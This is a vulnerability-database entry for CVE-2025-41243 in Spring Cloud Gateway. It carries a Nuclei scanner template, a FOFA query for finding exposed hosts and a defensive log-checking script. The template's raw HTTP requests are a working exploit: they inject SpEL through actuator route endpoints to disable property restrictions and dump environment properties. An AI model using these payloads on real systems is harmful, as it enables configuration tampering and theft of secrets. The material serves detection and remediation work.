Spring Cloud Gateway Server Webflux - Broken Access Control
CVE-2025-41243
Early Release
Description
Spring Cloud Gateway Server Webflux contains a vulnerability in which unsecured, exposed actuator endpoints allow modification of Spring Environment properties, letting attackers modify configuration. Exploitation requires that the actuator endpoints are exposed and unsecured.
Severity
Critical
CVSS Score
10
Exploit Probability
10%
Published Date
October 23, 2025
Template Author
redmomn
CVE-2025-41243.yaml
id: CVE-2025-41243

info:
  name: Spring Cloud Gateway Server Webflux - Broken Access Control
  author: Redmomn
  severity: critical
  description: |
    Spring Cloud Gateway Server Webflux contains a vulnerability caused by unsecured and exposed actuator endpoints allowing modification of Spring Environment properties, letting attackers modify configuration, exploit requires unsecured actuator endpoints exposure.
  impact: |
    Attackers can modify Spring Environment properties, potentially leading to configuration tampering and further compromise.
  remediation: |
    Secure actuator endpoints or disable gateway actuator exposure; update to latest Spring Cloud Gateway Server Webflux version.
  reference:
    - https://blog.z3r.ru/posts/spring-cloud-gateway-spel-vuln/
    - https://xz.aliyun.com/news/19006
    - https://spring.io/security/cve-2025-41243
    - https://nvd.nist.gov/vuln/detail/CVE-2025-41243
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-41243
    epss-score: 0.10243
    epss-percentile: 0.92817
    cwe-id: CWE-94
  metadata:
    verified: true
    fofa-query: '((header="Server: Netty@SpringBoot" || (body="Whitelabel Error Page" && body="There was an unexpected error")) && body!="couchdb") || title="SpringBootAdmin-Server" || body="SpringBoot"'
  tags: cve,cve2025,spring-boot,injection

variables:
  route: "{{rand_text_alpha(8)}}"

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        POST /actuator/gateway/routes/{{route}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "id": "{{route}}",
          "filters": [
            {
              "name": "AddResponseHeader",
              "args": {
                "value": "#{ @systemProperties['spring.cloud.gateway.restrictive-property-accessor.enabled'] = false}",
                "name": "cmd"
              }
            }
          ],
          "uri": "http://{{interactsh-url}}",
          "order": 0
        }
      - |
        POST /actuator/gateway/refresh HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /actuator/gateway/routes/{{route}} HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 201 && status_code_2 == 200 && status_code_3 == 200'
          - 'len(body_1) == 0 && len(body_2) == 0'
          - 'contains_all(body_3, "AddResponseHeader", "route_id")'
        condition: and
        internal: true

  - raw:
      - |
        POST /actuator/gateway/routes/{{route}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "id": "{{route}}",
          "filters": [
            {
              "name": "AddResponseHeader",
              "args": {
                "value": "#{ @environment.getPropertySources.?[#this.name matches '.*optional:classpath:.*' ][0].source.![{#this.getKey+'='+#this.getValue.toString}] }",
                "name": "cmd"
              }
            }
          ],
          "uri": "http://{{interactsh-url}}",
          "order": 0
        }
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 201'
          - 'len(body) == 0'
        condition: and
        internal: true

  - raw:
      - |
        POST /actuator/gateway/refresh HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'len(body) == 0'
        condition: and
        internal: true

  - raw:
      - |
        GET /actuator/gateway/routes/{{route}} HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "spring.cloud.gateway","RouteDefinitionRouteLocator")'
        condition: and
# digest: 4b0a00483046022100a003e85a23f528e5e1b079b3de518dc468998b140a7d8610dd05bafb75a4d4d1022100f63545ea55ee7eaeabd5f6147e63f91cbb0f1e07d0ad966c464203431298103e:922c64590222798bb761d5b6d8e72950
10.0 Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
CVE-2025-41243
CWE ID:
CWE-94
Remediation Steps
Secure actuator endpoints or disable gateway actuator exposure; update to latest Spring Cloud Gateway Server Webflux version.
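Added example (not part of the original template page or of the template project): a defender-side log check for the request sequence the template's matchers rely on, a POST to /actuator/gateway/routes/<id> answered with 201 followed by a POST to /actuator/gateway/refresh answered with 200. It assumes an access log in common log format from the gateway or a proxy in front of it; the sample lines, function names and severity labels are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample access log (common log format); addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Oct/2025:10:01:02 +0000] "POST /actuator/gateway/routes/abcdEFGH HTTP/1.1" 201 0
203.0.113.7 - - [23/Oct/2025:10:01:03 +0000] "POST /actuator/gateway/refresh HTTP/1.1" 200 0
203.0.113.7 - - [23/Oct/2025:10:01:04 +0000] "GET /actuator/gateway/routes/abcdEFGH HTTP/1.1" 200 412
198.51.100.4 - - [23/Oct/2025:10:02:00 +0000] "GET /actuator/health HTTP/1.1" 200 15
198.51.100.9 - - [23/Oct/2025:10:03:00 +0000] "POST /actuator/gateway/routes/probe HTTP/1.1" 401 0
198.51.100.9 - - [23/Oct/2025:10:03:01 +0000] "POST /actuator/gateway/refresh HTTP/1.1" 401 0
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})\b')
ROUTE = re.compile(r"^/actuator/gateway/routes/([^/]+)$")
REFRESH = "/actuator/gateway/refresh"


def find_gateway_writes(log_text):
    """Group state-changing gateway actuator requests by client address."""
    state = defaultdict(lambda: {"created": [], "refreshed": False, "denied": 0})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, method, target, status = m[1], m[2], m[3], int(m[4])
        path = target.split("?", 1)[0]
        route = ROUTE.match(path)
        if method not in ("POST", "DELETE") or not (route or path == REFRESH):
            continue  # reads and unrelated endpoints are out of scope here
        entry = state[ip]
        if status in (401, 403):
            entry["denied"] += 1               # access control rejected the write
        elif route and method == "POST" and status == 201:
            entry["created"].append(route[1])  # route definition was accepted
        elif path == REFRESH and status == 200 and entry["created"]:
            entry["refreshed"] = True          # the accepted route was activated
    return dict(state)


def severity(entry):
    """Rank a client's activity: an accepted and refreshed route is the worst case."""
    if entry["created"] and entry["refreshed"]:
        return "critical"
    return "high" if entry["created"] else "info"


if __name__ == "__main__":
    for ip, entry in find_gateway_writes(SAMPLE_LOG).items():
        print(ip, severity(entry), entry)
```

A "critical" result means an unauthenticated client both created and activated a route, so the gateway's current route list should be reviewed; "info" entries show writes that access control already rejected.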